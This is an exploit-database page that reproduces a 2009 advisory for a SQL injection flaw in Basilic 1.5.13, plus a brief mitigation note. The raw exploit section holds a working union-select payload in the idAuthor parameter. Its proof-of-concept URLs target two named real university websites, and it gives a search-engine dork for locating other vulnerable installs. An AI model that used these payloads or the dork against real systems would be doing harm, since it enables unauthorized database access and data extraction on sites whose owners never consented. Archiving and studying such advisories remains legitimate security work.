header-logo
Suggest Exploit
vendor:
Basilic
by:
NoGe
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Basilic
Affected Version From: 1.5.13
Affected Version To: 1.5.13
Patch Exists: YES
Related CWE: N/A
CPE: a:artis:basilic
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Basilic 1.5.13 SQL Injection Vulnerability

Basilic version 1.5.13 is vulnerable to SQL injection. An attacker can send a specially crafted HTTP request to the vulnerable index.php file with a malicious SQL statement which can be used to extract information from the database. An example of a malicious request is http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

==================================================================================================


  [o] Basilic 1.5.13 SQL Injection Vulnerability

       Software : Basilic version 1.5.13
       Vendor   : http://artis.imag.fr/Software/Basilic/
       Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==================================================================================================


  [o] Vulnerable file


       index.php



  [o] Exploit

       http://localhost/[path]/index.php?idAuthor=[SQL]



  [o] Proof of concept

       http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
       http://www.iarc.uaf.edu/publications/allpubs.php?idAuthor=-19+union+select+1,version()--



  [o] Dork

       "Powered by Basilic"


==================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR